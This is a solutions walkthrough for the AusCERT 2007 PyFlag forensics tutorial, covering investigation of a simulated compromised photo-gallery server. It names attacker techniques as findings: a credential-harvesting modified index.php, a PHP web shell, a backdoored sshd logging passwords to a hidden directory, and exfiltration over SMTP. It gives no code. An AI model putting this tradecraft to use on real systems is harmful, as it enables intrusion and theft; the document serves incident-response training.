Auscert2007 Tutorial Solutions
These are the spoilers for the 2007 tutorial. You may want to try solving the tutorial first before looking here.
These solutions may not be complete, there may be more to be found. Or things could be done differently. Feel free to update this page in a positive way.
Disclaimer
Creating a hands on tutorial is invariably difficult because I can't provide real evidence, so things are a little concocted. I tried to reflect the type of incidents I see in my daily work within this tutorial. These may or may not be too applicable to the scenarios you may encounter - take everything with a grain of salt as its just a simulation. Its very difficult to fabricate real evidence and im sure you will find holes or discrepancies in this tutorial - try to take the important lessons away. If you have some better suggestions please do not hesitate to mail pyflag-devel@lists.sourceforge.net.
Background Case Study 1
This is a quick recap of the backgrounds to the incident.
- You are the incident response team leader at an ISP selling hosted solutions.
- You receive a call from your friendly law enforcement contact advising you that a web site under your control is suspected of being involved in botnet activity.
- You decide to respond.
- You have at your disposal:
- The firewall logs.
- You have taken an image of the server's hard disk.
- Your IDS has taken a sample network capture of activity going to said host.
The web site in question is a photo appreciation site at http://you-like.myphotos.cc/.
- This is a typical LAMP server running Ubuntu Edgy (7.04)
- The web site it protected with an IPTables firewall (called shorewall) with full logging turned on (But no one ever looks at them regularly).
Disk Image analysis
- The disk was imaged using ewfacquire.
It was then loaded into PyFlag.
- The first thing we want to look at is the web directory.
- The main application on the system is Gallery2
- View the timeline
- Limit the files to those in the gallery directory (/usr/share/gallery2)
- Immediately we can see that index.php was modified recently (more recent than other files)
- What modifications were made?
- can you see what was modified? A new parameter was added - and files were saved in /dev/ptys/
- Examine the /dev/ptys/ directory - a couple of small files.
- These appear to be login details for web sites etc.
- We find a bunch of executables within the web root. Virus scanning those reveals they are well known Trojan downloaders.
- We find a reference for these in the web root - can you tell what the exploit is? Its ADODB ActiveX exploit.
We Load the apache log files into PyFlag
- What pages were accessed from this host? In particular which php pages were accessed?
- We discover another main.php file in a subdirectory of the web root - it does not belong with the gallery application.
- Its a php shell application. Who is accessing this shell? What are they doing with it?
- How did the server get compromised?
- Load the net accounting logs. How many connections occured to port 22? where from?
- Which connection was successful?
- Examine the secure log - secure log is rather short. Possibly deleted by intruder.
- Keyword search unallocated spapce for authentication logs.
- Which logs were successful? Which scanner worked? Who logged in?
- We find that sshd has been modified, look for strings in it
- There is an weird looking dir in it: /usr/man/.man/
- In there we see a log of all the passwords of everyone logging into the server. What was the original password they used? Was it complex?
Network Forensics
Load network forensics into the case. This is a small subset of the total duration of the compromise but is typical of attacker behaviour.
- Locate access to the php shell - its possible to see what commands were run now (through post variables).
- We find that data has been tarred off and sent away over smtp.
- We can locate the smtp connection. The tar file contains captured screen shots.
- Look at other connections:
- IRC connection to a channel
- Attacker is discussing exchange of credit card numbers.
